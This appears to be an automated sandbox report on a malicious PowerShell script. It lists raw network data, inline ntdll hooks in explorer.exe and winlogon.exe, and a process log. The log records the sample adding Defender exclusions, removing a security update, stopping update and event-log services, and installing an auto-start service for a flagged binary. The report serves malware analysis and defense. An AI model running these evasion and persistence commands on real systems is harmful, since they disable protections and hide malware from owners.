                                                        Data Ascii: ""XxEP%Gi\'s`+uMfpKuB1LECAwDr~gaj 1/S(}0D`:ME8N0LTsTkEe\]S[Ty@aK A1I;WDA!PAk
                                                        Dec 18, 2024 14:08:20.857753992 CET1236INData Raw: 42 cc 32 d0 39 41 cc 51 e9 2e 51 8a 06 b3 06 22 79 50 9e 92 3b 6c a0 93 e8 2c 0e 8d 57 65 17 48 62 01 a5 6e ea 9e 40 52 96 10 9e 05 04 0f 87 80 96 05 ab c6 64 05 93 73 27 63 04 84 e0 c8 84 92 0f af cd 71 48 51 3f 07 54 4f c8 fd 08 9a 4f af 23 3a
                                                        Data Ascii: B29AQ.Q"yP;l,WeHbn@Rds'cqHQ?TOO#:o:Li/C%CR/[a.t@G3bCu"aJIiBi^V38C!.F!IDb0#Pt|lB1b2$O#q@vr
                                                        Dec 18, 2024 14:08:20.857873917 CET1236INData Raw: 17 37 1e c3 a1 1d be a3 1f ad a0 aa a9 2b 6e c8 bf 2d 84 aa 08 41 28 fa ed 12 49 0b e1 2a a4 11 35 09 c7 4d 61 f2 2c ba 30 1d 24 78 72 2b 15 2c 70 0c 38 45 02 42 50 2e 70 fb 47 fd 00 0b 08 e0 64 2f de 6e 80 e3 41 31 ff eb 51 35 d0 1d cd e1 40 2e
                                                        Data Ascii: 7+n-A(I*5Ma,0$xr+,p8EBP.pGd/nA1Q5@.&8xdn!x5I N4}\ML"6Xd,4D$zLLu8*[7lE({DtX9iT9c"AdRT#{\fj:BP^$^EeI
                                                        Dec 18, 2024 14:08:20.857889891 CET1236INData Raw: 11 85 10 3b 20 c6 78 f6 13 38 ba 3f f2 6e 2f 2f 86 0b d2 0e 48 2b bb 05 44 d1 eb 30 b6 e0 d4 57 0a bf eb 1b 10 78 b9 eb 65 0b 0a 04 61 10 89 c2 87 c5 44 33 01 39 00 c4 a5 41 80 f8 cc ba 2e 15 85 86 44 34 c6 8b 26 d2 2f 61 23 6a 15 03 b9 6e d7 d0
                                                        Data Ascii: ; x8?n//H+D0WxeaD39A.D4&/a#jn&`AFT3AB<$7O5TZI7j@4-|p `*Z@-d3Hg(h#`EA;D2CQ 99sd!^5'
                                                        Dec 18, 2024 14:08:20.976701975 CET1236INData Raw: 18 43 c2 2d db 99 36 96 42 8a c7 4c 1a 85 ad 72 6c 76 32 84 4c 30 3b 89 38 54 d7 69 eb dc 49 78 3d df fd 16 ca d9 cd 47 09 c3 2c 54 4a 7d 60 ce 2b 05 7a ce ec 1a de 65 61 99 b0 52 11 44 56 68 42 28 01 b9 97 40 2b 91 6a b2 eb 49 54 01 bc 83 f9 7a
                                                        Data Ascii: C-6BLrlv2L0;8TiIx=G,TJ}`+zeaRDVhB(@+jITz%Hc~&<J>0dpdBP"`^^A8%igI/Bf?F$w>Ql0iQfB|>J@kI}M,w7{s[xX`>#SP8I'(9})A5E$+Q(MLfE 0D#TPB


                                                        Code Manipulations

                                                        User Modules

                                                        Hook Summary

                                                        Function NameHook TypeActive in Processes
                                                        ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                        NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                        ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                        NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                        ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                        NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                        NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                        ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                        ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                        NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                        RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                        NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                        NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                        ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                        ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                        Processes

                                                        Process: explorer.exe, Module: ntdll.dll
                                                        Function NameHook TypeNew Data
                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                        Process: winlogon.exe, Module: ntdll.dll
                                                        Function NameHook TypeNew Data
                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:1
                                                        Start time:08:08:02
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.png.ps1"
                                                        Imagebase:0x7ff7b2bb0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:08:08:02
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:08:08:05
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                        Imagebase:0x7ff7b2bb0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:08:08:31
                                                        Start date:18/12/2024
                                                        Path:C:\Users\user\AppData\Roaming\LB31.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Roaming\LB31.exe"
                                                        Imagebase:0x7ff7e7060000
                                                        File size:7'679'488 bytes
                                                        MD5 hash:C9E6AA21979D5FC710F1F2E8226D9DFE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 63%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:08:08:32
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                        Imagebase:0x7ff620390000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:08:08:32
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:08:08:34
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                        Imagebase:0x7ff71d710000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:08:08:34
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                        Imagebase:0x7ff7417d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:08:08:34
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:08:08:34
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:13
                                                        Start time:08:08:34
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\wusa.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                        Imagebase:0x7ff6f98a0000
                                                        File size:345'088 bytes
                                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:08:08:34
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                        Imagebase:0x7ff7417d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:15
                                                        Start time:08:08:34
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:16
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                        Imagebase:0x7ff7417d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:17
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:18
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                                        Imagebase:0x7ff7417d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:19
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:20
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                        Imagebase:0x7ff7417d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:21
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:22
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                        Imagebase:0x7ff701d80000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:23
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                        Imagebase:0x7ff701d80000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:24
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:25
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                        Imagebase:0x7ff701d80000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:26
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:27
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                        Imagebase:0x7ff701d80000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:28
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:29
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\dialer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\dialer.exe
                                                        Imagebase:0x7ff6768b0000
                                                        File size:39'936 bytes
                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:30
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:31
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe delete "LIB"
                                                        Imagebase:0x7ff7417d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:32
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:33
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                        Imagebase:0x7ff7417d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:34
                                                        Start time:08:08:35
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:35
                                                        Start time:08:08:36
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\winlogon.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:winlogon.exe
                                                        Imagebase:0x7ff779b10000
                                                        File size:906'240 bytes
                                                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:36
                                                        Start time:08:08:36
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                        Imagebase:0x7ff7417d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:37
                                                        Start time:08:08:36
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe start "LIB"
                                                        Imagebase:0x7ff7417d0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:38
                                                        Start time:08:08:36
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:39
                                                        Start time:08:08:36
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:40
                                                        Start time:08:08:36
                                                        Start date:18/12/2024
                                                        Path:C:\ProgramData\Mig\Mig.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\ProgramData\Mig\Mig.exe
                                                        Imagebase:0x7ff6fd200000
                                                        File size:7'679'488 bytes
                                                        MD5 hash:C9E6AA21979D5FC710F1F2E8226D9DFE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 63%, ReversingLabs
                                                        Has exited:true

                                                        General

                                                        Target ID:41
                                                        Start time:08:08:36
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\lsass.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\lsass.exe
                                                        Imagebase:0x7ff6afc30000
                                                        File size:59'456 bytes
                                                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:42
                                                        Start time:08:08:37
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:43
                                                        Start time:08:08:37
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\dwm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"dwm.exe"
                                                        Imagebase:0x7ff7d1820000
                                                        File size:94'720 bytes
                                                        MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:44
                                                        Start time:08:08:40
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:45
                                                        Start time:08:08:41
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                        Imagebase:0x7ff7df220000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:46
